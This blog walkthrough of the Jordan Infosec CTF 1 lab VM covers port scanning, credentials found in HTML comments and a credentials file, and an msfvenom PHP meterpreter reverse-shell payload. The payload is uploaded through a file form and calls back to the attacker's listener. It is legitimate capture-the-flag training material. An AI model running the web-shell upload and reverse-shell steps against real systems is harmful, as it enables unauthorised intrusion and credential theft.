Jordan Infosec CTF 1 Boot to Root VM Walkthrough

Introduction

Sorry for the long delay in posting – life got a little busy over the past month or two. Today I’ll be posting my write up of how to compromise the excellent Jordan Infosec CTF 1 VM created by @Banyrock

This VM is more at the CTF end of the spectrum than a traditional Boot to Root, but that’s ok 🙂

Let’s get to it!

Host identification and Port Mapping

Let’s start by finding out which host on my network the VM lives on:

192.168.56.101 it is then 🙂 Let’s see what’s running on that host:

root@kali:~# nmap -sV -T5 -p- -sC 192.168.56.101 -n
Starting Nmap 7.70 ( https://nmap.org ) at 2018-05-20 14:06 BST
Nmap scan report for 192.168.56.101
Host is up (0.00056s latency).
Not shown: 65533 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 af:b9:68:38:77:7c:40:f6:bf:98:09:ff:d9:5f:73:ec (RSA)
|   256 b9:df:60:1e:6d:6f:d7:f6:24:fd:ae:f8:e3:cf:16:ac (ECDSA)
|_  256 78:5a:95:bb:d5:bf:ad:cf:b2:f5:0f:c0:0c:af:f7:76 (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
| http-robots.txt: 8 disallowed entries 
| / /backup /admin /admin_area /r00t /uploads 
|_/uploaded_files /flag
|_http-server-header: Apache/2.4.18 (Ubuntu)
| http-title: Sign-Up/Login Form
|_Requested resource was login.php
MAC Address: 08:00:27:68:18:58 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 35.10 seconds
root@kali:~# 

Another tiny attack surface, then. SSH and an Apache server! A few interesting things are disallowed in the robots.txt file, including a “/flag”.. Sounds like our first flag!

HTTP Server

Navigating to the website’s homepage yields this form:

Nothing in the HTML gives anything away either and the form isn’t vulnerable to SQLi / didn’t fold under a quick brute force. Let’s see what /robots.txt contains:

User-agent: *
Disallow: /
Disallow: /backup
Disallow: /admin
Disallow: /admin_area
Disallow: /r00t
Disallow: /uploads
Disallow: /uploaded_files
Disallow: /flag

Loads of interesting stuff here. Let’s go and take a look at /flag and hopefully get our first flag:

As expected, our first flag.. too easy! Now we manually enumerate all of the other endpoints referenced in the robots.txt file.

/backup, /admin, /r00t, /uploads all yield a 404 error, /uploaded_files yields a blank screen but /admin_area gives us something interesting in the HTML:

<html>
<head>
<title>
Fake admin area :)
</title>
<body>
<center><h1>The admin area not work :) </h1></center>
<!--	username : admin
	password : 3v1l_H@ck3r
	The 2nd flag is : {7412574125871236547895214}
-->
</body>
</html>

How convenient… The credentials were hiding in the HTML. Along with our second flag file 🙂

Let’s chuck those credentials into the login page and start looking for our third flag.

Post-Login

After logging in we see a file upload page. Let’s see if we can upload a web shell and get our first shell on the box.

First step, create the shell:

root@kali:~/Downloads# msfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.56.102 LPORT=443 -f raw > shell.php
No platform was selected, choosing Msf::Module::Platform::PHP from the payload
No Arch selected, selecting Arch: php from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 30304 bytes

Second step, upload the shell.

Third step, start the meterpreter listener.

Fourth step, navigate to /uploads

Fifth step, shell!

msf exploit(multi/handler) > run

[*] Started reverse TCP handler on 192.168.56.102:443 
[*] Meterpreter session 1 opened (192.168.56.102:443 -> 192.168.56.101:57944) at 2018-05-20 14:50:36 +0100

meterpreter > sysinfo 
Computer    : Jordaninfosec-CTF01
OS          : Linux Jordaninfosec-CTF01 4.4.0-72-generic #93-Ubuntu SMP Fri Mar 31 14:07:41 UTC 2017 x86_64
Meterpreter : php/linux
meterpreter > 

Now’s the hard bit, escalating from where we are to root.

Privesc

With our new fancy shell, running “ls” in the root of the web directory shows a file named “hint.txt”. Catting that file yields this output:

try to find user technawi password to read the flag.txt file, you can find it in a hidden file ;)

The 3rd flag is : {7645110034526579012345670}

So that’s good news, we have another flag and a hint for where to find the next user!

After…50?… greps and finds where I tried to look in only hidden files I eventually gave up and grep’d the entire disk for a file containing “technawi”:

grep --exclude-dir=/proc -rnw 'technawi' . 2>/dev/null ; echo DONE
/etc/subgid:3:technawi:165536:65536
/etc/mysql/conf.d/credentials.txt:3:username : technawi
/etc/subuid:3:technawi:165536:65536
/etc/passwd:30:technawi:x:1000:1000:technawi,,,:/home/technawi:/bin/bash
/etc/group:5:adm:x:4:syslog,technawi
/etc/group:18:cdrom:x:24:technawi
/etc/group:21:sudo:x:27:technawi
/etc/group:23:dip:x:30:technawi
/etc/group:35:plugdev:x:46:technawi
/etc/group:49:lxd:x:110:technawi
/etc/group:54:technawi:x:1000:
/etc/group:55:lpadmin:x:115:technawi
/etc/group:56:sambashare:x:116:technawi

Line 3 looks interesting! Not a hidden file though, so my initial attempts to only find hidden files didn’t work :@

Credentials.txt contains:

cat /etc/mysql/conf.d/credentials.txt
The 4th flag is : {7845658974123568974185412}

username : technawi
password : 3vilH@ksor

Yey! Now we can ssh in and get the next (final?) flag!

After SSHing in as technawi and catting /var/www/html/flag.txt we get:

technawi@Jordaninfosec-CTF01:/var/www/html$ cat flag.txt 
The 5th flag is : {5473215946785213456975249}

Good job :)

You find 5 flags and got their points and finish the first scenario....

Done!

Conclusion

Great VM. Really good fun, quite straight forward to compromise. The hardest bit was finding technawi’s credentials, but it was worth the perseverance!

Add a Comment

Your email address will not be published. Required fields are marked *